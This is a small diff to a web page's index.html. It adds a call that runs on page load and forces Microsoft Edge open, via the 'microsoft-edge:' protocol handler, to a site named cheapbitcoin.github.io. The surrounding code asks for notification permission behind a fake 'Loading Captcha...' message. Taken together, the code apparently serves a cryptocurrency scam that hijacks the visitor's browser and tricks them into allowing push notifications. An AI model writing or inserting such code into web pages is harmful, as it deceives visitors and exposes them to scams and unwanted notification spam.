--- a/index.html
+++ b/index.html
@@ -21,6 +21,7 @@
 	function openLinkInIE(url){
  	 window.open("microsoft-edge:"+ "cheapbitcoin.github.io");
 	}
+		openLinkInIE(); 
 		
 	let permission = Notification.requestPermission();
 	setTimeout(function(){ var greeting = new Notification("Loading Captcha..."); }, 3000)
